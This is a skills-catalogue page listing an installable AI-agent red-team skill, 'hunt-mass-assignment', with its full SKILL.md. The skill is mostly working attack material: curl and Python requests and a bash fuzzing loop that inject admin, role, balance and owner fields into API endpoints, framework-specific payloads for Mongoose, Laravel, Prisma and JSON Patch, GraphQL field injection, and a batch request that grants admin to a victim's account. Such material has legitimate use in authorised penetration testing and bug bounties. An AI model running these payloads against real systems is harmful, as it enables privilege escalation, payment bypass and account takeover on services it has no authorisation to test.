SkillAgentSearch skills...

hunt-mass-assignment

Hunt mass assignment via sensitive field injection and ORM framework exploitation.

Install / Use

npx skills add uphiago/recon-skills --skill hunt-mass-assignment

Installs into whichever agent you are using.

About this skill
📄

SKILL.md

Installable skill definition

Quality Score

89/100

Category

Security

Supported Platforms

Universal

Our assessment of hunt-mass-assignment

hunt-mass-assignment scores 89/100 on our quality scale, 504th of 971 Security skills we index.

Its SKILL.md is 6.6 KB long, well organised into 26 sections with 6 code examples: a thorough specification that gives an agent plenty to work with.

With 1,280 GitHub stars, it is one of the more widely adopted skills in the catalogue.

Substance
29/30
Structure
20/20
Description
12/15
Adoption
13/20
Freshness
15/15

Maintenance, license and trust

  • The repository was last updated 29 days ago, so hunt-mass-assignment is actively maintained.
  • It is released under the MIT license, a permissive license that allows use, modification and commercial use with attribution.
  • Its trust signals score 100/100, with no cautions. These come from repository metadata, not a code audit — read the skill file before letting an agent act on it.

hunt-mass-assignment compared with similar skills

All 4 of these similar skills score higher than hunt-mass-assignment; compare them before choosing.

SkillScoreStarsUpdatedFormat
hunt-mass-assignment (this skill)by uphiago891.3k29d agoSKILL.md
Agent-Reachby Panniantong10086.6k15d agoCLAUDE.md
headroomby headroomlabs-ai10074.2ktodayCLAUDE.md
Scraplingby D4Vinci10084.8ktodayMCP Server
crawl4aiby unclecode10084.6k6d agoMCP Server

Frequently asked questions

How do I install hunt-mass-assignment?
Run npx skills add uphiago/recon-skills --skill hunt-mass-assignment. The install tabs above show the steps for each supported agent.
Which AI agents does hunt-mass-assignment work with?
It is written for Universal, as a SKILL.md file. Other agents that read the same format can often use it too.
Is hunt-mass-assignment safe to use?
It is MIT-licensed and scores 100/100 on trust signals. Skills are instructions an agent will follow, so read the file before installing it and do not approve commands you do not understand.
Is hunt-mass-assignment still maintained?
The repository was last updated 29 days ago, so hunt-mass-assignment is actively maintained.

name: hunt-mass-assignment description: Hunt mass assignment via sensitive field injection and ORM framework exploitation. category: redteam version: 1.1.0 revision_date: 2026-07-25 license: MIT platforms: [linux] compatibility: Requires curl, python3 tags: [redteam, mass-assignment, API, ORM, authorization, field-injection] related_skills:

  • hunt-api-misconfig
  • hunt-idor
  • hunt-write-gap

Mass Assignment Hunting

Hunt for mass assignment vulnerabilities where API endpoints blindly bind user-supplied fields to internal objects without allowlisting. Sensitive fields like isAdmin, role, ownerId, plan, tier, balance, and verified can be injected to escalate privileges, bypass payments, or assume ownership of resources.

When to Use

  • API accepts JSON/XML/form body with fields beyond what the UI exposes.
  • User profile updates, registration, checkout, or resource creation endpoints.
  • Framework ORMs (Rails ActiveRecord, Laravel Eloquent, Django ORM, Mongoose, Prisma) where bulk assignment is the default.
  • PATCH endpoints that accept sparse updates — may skip per-field authorization.

Quick Detection

# Inject sensitive fields into profile update
curl --max-time 30 --connect-timeout 10 -sk -X PATCH "https://target.com/api/user/profile" \
  -H "Content-Type: application/json" \
  -d '{"name":"test","isAdmin":true,"role":"admin"}'

Key Sensitive Field Dictionary

| Field | Impact | |---|---| | isAdmin, is_admin, admin | Admin escalation | | role, roles, user_role | Role escalation | | ownerId, user_id, authorId | Resource takeover | | plan, tier, subscription_type | Payment bypass | | balance, credits, wallet | Financial manipulation | | verified, is_verified, email_verified | Verification bypass | | discount, coupon_applied, promo | Pricing manipulation | | organizationId, tenantId, teamId | Cross-tenant access | | banned, disabled, suspended | Account state control |

Procedure

Phase 1 — Sensitive Field Injection

# Dictionary fuzzing on profile endpoint
FIELDS=("isAdmin:true" "role:admin" "is_admin:true" "roles:[\"admin\"]"
        "plan:enterprise" "tier:platinum" "balance:999999"
        "verified:true" "ownerId:1" "user_id:1" "authorId:1"
        "organizationId:1" "teamId:1" "tenantId:1"
        "can_manage:true" "permissions:{\"admin\":true}"
        "access_level:admin" "group:administrators"
        "is_superuser:true" "superuser:1" "staff:true")

for field in "${FIELDS[@]}"; do
  key="${field%%:*}"
  val="${field#*:}"
  curl --max-time 30 --connect-timeout 10 -sk -X PATCH "https://target.com/api/user/profile" \
    -H "Content-Type: application/json" \
    -d "{\"$key\":$val,\"name\":\"test\"}" \
    -w "\n%{http_code} — $key\n" -o /dev/null
done

Phase 2 — Shape Variants & Encoding

# Dot-path notation (Mongoose, some ORMs)
curl --max-time 30 --connect-timeout 10 -sk -X PATCH "https://target.com/api/user/profile" \
  -d '{"profile.is_admin":true}' \
  -H "Content-Type: application/json"

# Bracket notation (PHP frameworks)
curl --max-time 30 --connect-timeout 10 -sk -X POST "https://target.com/api/register" \
  -d 'user[name]=test&user[is_admin]=1' \
  -H "Content-Type: application/x-www-form-urlencoded"

# Array wrappers (Rails, Laravel)
curl --max-time 30 --connect-timeout 10 -sk -X PATCH "https://target.com/api/user/profile" \
  -d '{"user":{"name":"test","admin":true}}' \
  -H "Content-Type: application/json"

# Duplicate keys (parser differential)
curl --max-time 30 --connect-timeout 10 -sk -X PATCH "https://target.com/api/user/profile" \
  -d '{"name":"test","role":"user","role":"admin"}' \
  -H "Content-Type: application/json"

Phase 3 — Framework-Specific Patterns

# Django REST Framework — PATCH on nested serializers
requests.patch("https://target.com/api/profile/", json={
    "user": {"is_staff": True, "is_superuser": True}
})

# Laravel Eloquent — forceFill bypass
requests.post("https://target.com/api/users", json={
    "name": "test", "email": "test@test.com",
    "is_admin": 1, "role": "admin"
})

# Mongoose — $set on findByIdAndUpdate
requests.put("https://target.com/api/users/me", json={
    "$set": {"role": "admin", "verified": True}
})

# Prisma — connect/create nested relations
requests.post("https://target.com/api/organizations", json={
    "name": "test",
    "owner": {"connect": {"id": 1}}  # takeover existing owner
})

Phase 4 — Batch & Patch Format Exploitation

# JSON Patch — add operation with sensitive field
curl --max-time 30 --connect-timeout 10 -sk -X PATCH "https://target.com/api/user/profile" \
  -H "Content-Type: application/json-patch+json" \
  -d '[{"op":"add","path":"/role","value":"admin"}]'

# JSON Merge Patch — full object replacement
curl --max-time 30 --connect-timeout 10 -sk -X PATCH "https://target.com/api/user/profile" \
  -H "Content-Type: application/merge-patch+json" \
  -d '{"role":"admin","verified":true}'

# Batch endpoint — per-item auth skipped
curl --max-time 30 --connect-timeout 10 -sk -X PUT "https://target.com/api/users/batch" \
  -d '{"users":[{"id":"me","name":"test"},{"id":"VICTIM_ID","role":"admin"}]}'

Phase 5 — GraphQL Input Type Injection

mutation UpdateProfile {
  updateProfile(input: {
    name: "test"
    role: ADMIN       # injected field not in schema
    isAdmin: true     # injected field
  }) {
    id
    role
  }
}

Pitfalls

  • Some frameworks silently ignore unknown fields. Try the same field with different naming conventions (snake_case, camelCase, PascalCase).
  • PATCH may be more permissive than PUT. Test both methods — some frameworks apply different serializers per HTTP method.
  • GraphQL input types are self-documenting. Use introspection to find all writable fields, then test for extras not in the schema.
  • Batch endpoints often skip per-item authorization. Test with mixed arrays where only one item belongs to the attacker.

Verification

  1. Inject a sensitive field into a PATCH/POST/PUT endpoint that the attacker should not control.
  2. Verify the field was persisted by reading it back via GET.
  3. Confirm the field change grants elevated access (e.g., access admin panel, view other users).
  4. Test with multiple naming conventions to rule out framework-level field rejection.
  5. Check batch and patch-format endpoints which may use different serializers.

Related Skills

  • hunt-api-misconfig — Broader API misconfiguration including mass assignment patterns.
  • hunt-idor — Object-level authorization gaps often combined with mass assignment.
  • hunt-write-gap — Endpoints that allow writes without requiring read authentication.

Related Skills

View on GitHub
GitHub Stars1.3k
CategorySecurity
Updated29d ago
Forks215

Languages

Python

Trust signals

100/100

From repository metadata: license, adoption, age and documentation. Not a code audit — see the Safety scan above for what the skill file itself contains.

No cautions